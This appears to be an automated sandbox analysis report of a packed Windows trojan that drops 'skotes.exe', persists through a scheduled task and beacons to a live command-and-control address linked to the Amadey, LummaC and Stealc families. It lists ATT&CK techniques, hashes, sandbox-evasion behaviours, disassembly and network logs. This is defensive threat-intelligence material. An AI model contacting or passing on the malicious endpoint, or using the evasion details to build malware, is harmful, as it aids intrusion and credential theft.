                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    1
                    Scheduled Task/Job
                    251
                    Virtualization/Sandbox Evasion
                    LSASS Memory741
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    12
                    Process Injection
                    Security Account Manager2
                    Process Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Deobfuscate/Decode Files or Information
                    NTDS251
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput Capture11
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing
                    Cached Domain Credentials1
                    Account Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSync1
                    System Owner/User Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    File and Directory Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow224
                    System Information Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1559376 Sample: file.exe Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 24 Suricata IDS alerts for network traffic 2->24 26 Found malware configuration 2->26 28 Antivirus detection for URL or domain 2->28 30 7 other signatures 2->30 6 file.exe 5 2->6         started        10 skotes.exe 2->10         started        12 skotes.exe 12 2->12         started        process3 dnsIp4 18 C:\Users\user\AppData\Local\...\skotes.exe, PE32 6->18 dropped 20 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 6->20 dropped 32 Detected unpacking (changes PE section rights) 6->32 34 Tries to evade debugger and weak emulator (self modifying code) 6->34 36 Tries to detect virtualization through RDTSC time measurements 6->36 15 skotes.exe 6->15         started        38 Antivirus detection for dropped file 10->38 40 Multi AV Scanner detection for dropped file 10->40 42 Tries to detect sandboxes and other dynamic analysis tools (window names) 10->42 44 Machine Learning detection for dropped file 10->44 22 185.215.113.43, 49783, 49799, 49815 WHOLESALECONNECTIONSNL Portugal 12->22 46 Hides threads from debuggers 12->46 48 Tries to detect sandboxes / dynamic malware analysis system (registry check) 12->48 50 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 12->50 file5 signatures6 process7 signatures8 52 Hides threads from debuggers 15->52 54 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->54 56 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->56

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe53%ReversingLabsWin32.Packed.Themida
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe53%ReversingLabsWin32.Packed.Themida
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://185.215.113.43/Zu7JuNko/index.php32100%Avira URL Cloudmalware
                    http://185.215.113.43/Zu7JuNko/index.phpdedO100%Avira URL Cloudmalware
                    http://185.215.113.43/Zu7JuNko/index.php#100%Avira URL Cloudphishing
                    http://185.215.113.43/Zu7JuNko/index.phpm100%Avira URL Cloudmalware
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.43/Zu7JuNko/index.phpfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.215.113.43/Zu7JuNko/index.php32skotes.exe, 00000006.00000002.2957282024.0000000000658000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://185.215.113.43/Zu7JuNko/index.php#skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      unknown
                      http://185.215.113.43/Zu7JuNko/index.phpncodedskotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://185.215.113.43/Zu7JuNko/index.phpHskotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://185.215.113.43/Zu7JuNko/index.phpXskotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://185.215.113.43/Zu7JuNko/index.phpmskotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://185.215.113.43/Zu7JuNko/index.phpdedOskotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://185.215.113.43/skotes.exe, 00000006.00000002.2957282024.000000000066E000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.43
                              unknownPortugal
                              206894WHOLESALECONNECTIONSNLtrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1559376
                              Start date and time:2024-11-20 13:06:07 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 52s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                              EGA Information:
                              • Successful, ratio: 25%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target file.exe, PID 6760 because it is empty
                              • Execution Graph export aborted for target skotes.exe, PID 1136 because there are no executed function
                              • Execution Graph export aborted for target skotes.exe, PID 5752 because there are no executed function
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe
                              TimeTypeDescription
                              07:08:02API Interceptor149471x Sleep call for process: skotes.exe modified
                              12:07:03Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.43file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.43/Zu7JuNko/index.php
                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.43/Zu7JuNko/index.php
                              file.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.43/Zu7JuNko/index.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.43/Zu7JuNko/index.php
                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.43/Zu7JuNko/index.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.43/Zu7JuNko/index.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.43/Zu7JuNko/index.php
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.43/Zu7JuNko/index.php
                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                              • 185.215.113.43/Zu7JuNko/index.php
                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                              • 185.215.113.43/Zu7JuNko/index.php
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.43
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                              • 185.215.113.206
                              file.exeGet hashmaliciousLummaCBrowse
                              • 185.215.113.16
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exefile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                Process:C:\Users\user\Desktop\file.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1863680
                                Entropy (8bit):7.949970010980385
                                Encrypted:false
                                SSDEEP:49152:2IQaFswVmOsXVQ8VUoKKa7T2oJnBFuC9:2pa6UmHXV1U/Ka32SL1
                                MD5:EBE6DE9BE122D27057536193303F1F89
                                SHA1:199B00D481006678F3A2DB4902910A883BE2F275
                                SHA-256:BACE923F8BE90BF0F398E9310D52723265E250651CB36115BC233CA3300160A6
                                SHA-512:C10AFDF10124390958160A5FC5B2AC7EEAA3ED4705A8B4BBA89AA1AC17128FA8979CF9081B1997A9D8A03ED6C2C756878DA9A8B96162C84B1F3B52EAB55EE5D8
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 53%
                                Joe Sandbox View:
                                • Filename: file.exe, Detection: malicious, Browse
                                Reputation:low
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f............................. J...........@..........................PJ......x....@.................................W...k.......H.....................J.............................0.J..................................................... . ............................@....rsrc...H...........................@....idata ............................@... ..*.........................@...ihqucnpr.`....0..R..................@...loaatlni......J......J..............@....taggant.0... J.."...N..............@...................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\file.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:modified
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:[ZoneTransfer]....ZoneId=0
                                Process:C:\Users\user\Desktop\file.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):284
                                Entropy (8bit):3.4012587809509416
                                Encrypted:false
                                SSDEEP:6:lNDaMdtXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lBxl/3ut0:lNbdZf2RKQ1CGAFAjzvYRQVBj/3ut0
                                MD5:516A437E33DA772906B2717607E4FD55
                                SHA1:39C8A303564CC27E1919FED0BAF1E2D2E034C82B
                                SHA-256:FD385CA8E6206E31B26B1F4D3A86DA71AD552C84F899FED74136EBE334E1E7D9
                                SHA-512:D69B9909CE1A8CB81063DB618DEC36F11FCF56754DD360D6E9F011C3CBA5B85F186B77EDDA360F20248C20C02F79D1310EE46EB4066E1FF5C8E1606D7EDA3AD3
                                Malicious:false
                                Reputation:low
                                Preview:..........NI....)j.YF.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.949970010980385
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'863'680 bytes
                                MD5:ebe6de9be122d27057536193303f1f89
                                SHA1:199b00d481006678f3a2db4902910a883be2f275
                                SHA256:bace923f8be90bf0f398e9310d52723265e250651cb36115bc233ca3300160a6
                                SHA512:c10afdf10124390958160a5fc5b2ac7eeaa3ed4705a8b4bba89aa1ac17128fa8979cf9081b1997a9d8a03ed6c2c756878da9a8b96162c84b1f3b52eab55ee5d8
                                SSDEEP:49152:2IQaFswVmOsXVQ8VUoKKa7T2oJnBFuC9:2pa6UmHXV1U/Ka32SL1
                                TLSH:FF8533911B47307EE86682F523AF848CBBB4BE62D3D61E38E619CA7533154DB425E0DC
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                Icon Hash:90cececece8e8eb0
                                Entrypoint:0x8a2000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                jmp 00007F6F311CC80Ah
                                cmovle ebx, dword ptr [eax+eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                jmp 00007F6F311CE805h
                                add byte ptr [ebx], cl
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax+37h], ah
                                adc cl, byte ptr [edi]
                                aam 8Fh
                                mov word ptr [ebx], seg?
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                or ecx, dword ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push es
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                or ecx, dword ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x448.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a00800x10ihqucnpr
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x4a00300x18ihqucnpr
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x680000x2de006f731acc3610ed0db6df8ef7b17cfb50False0.9982703933923706data7.984163240337756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x690000x4480x60023f61aeefa7c3d30c07a21aa8f45e969False0.3053385416666667data5.28505835027857IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x6b0000x2a00000x2006608e2e68038d83a8db58f0c9758e596unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                ihqucnpr0x30b0000x1960000x195200f287e3c41561b135b96718afbd4ebb0aFalse0.9945654794045048data7.953078647253167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                loaatlni0x4a10000x10000x4001a7dbe96e28d0a0da6e519a2d6655338False0.853515625data6.4667655699525275IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x4a20000x30000x2200576ba84a2deef18d66e973601d6ad347False0.064453125DOS executable (COM)0.754750260100703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_MANIFEST0x690700x256ASCII text, with CRLF line terminators0.5100334448160535
                                RT_MANIFEST0x692c80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                DLLImport
                                kernel32.dlllstrcpy
                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-11-20T13:08:05.776431+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449783185.215.113.4380TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Nov 20, 2024 13:08:05.073600054 CET4978380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:05.079705954 CET8049783185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:05.080454111 CET4978380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:05.080642939 CET4978380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:05.085536957 CET8049783185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:05.775851011 CET8049783185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:05.776431084 CET4978380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:07.281462908 CET4978380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:07.281791925 CET4979980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:07.286792994 CET8049799185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:07.286951065 CET4979980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:07.287128925 CET4979980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:07.287406921 CET8049783185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:07.287599087 CET4978380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:07.291980982 CET8049799185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:07.990255117 CET8049799185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:07.990391016 CET4979980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:09.609586000 CET4979980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:09.610027075 CET4981580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:09.615278006 CET8049799185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:09.615346909 CET4979980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:09.615659952 CET8049815185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:09.615837097 CET4981580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:09.616029978 CET4981580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:09.622359991 CET8049815185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:10.320969105 CET8049815185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:10.321037054 CET4981580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:11.828632116 CET4981580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:11.829150915 CET4983180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:11.834173918 CET8049815185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:11.834238052 CET4981580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:11.834681034 CET8049831185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:11.834734917 CET4983180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:11.836378098 CET4983180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:11.841492891 CET8049831185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:12.550599098 CET8049831185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:12.550669909 CET4983180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:14.249011993 CET4983180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:14.249408960 CET4984680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:14.254254103 CET8049846185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:14.254368067 CET4984680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:14.255903006 CET8049831185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:14.255980968 CET4983180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:14.256150961 CET4984680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:14.260956049 CET8049846185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:14.983750105 CET8049846185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:14.983891010 CET4984680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:16.500797987 CET4984680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:16.501173019 CET4986180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:16.506067038 CET8049846185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:16.506113052 CET8049861185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:16.506139994 CET4984680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:16.506215096 CET4986180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:16.506350040 CET4986180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:16.514049053 CET8049861185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:17.254261971 CET8049861185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:17.254343033 CET4986180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:18.878000975 CET4986180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:18.878349066 CET4987880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:18.883272886 CET8049861185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:18.883291960 CET8049878185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:18.883346081 CET4986180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:18.883418083 CET4987880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:18.883585930 CET4987880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:18.891308069 CET8049878185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:19.612067938 CET8049878185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:19.612145901 CET4987880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:21.125370979 CET4987880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:21.125684977 CET4989080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:21.134519100 CET8049878185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:21.134601116 CET4987880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:21.134641886 CET8049890185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:21.134723902 CET4989080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:21.134896994 CET4989080192.168.2.4185.215.113.43
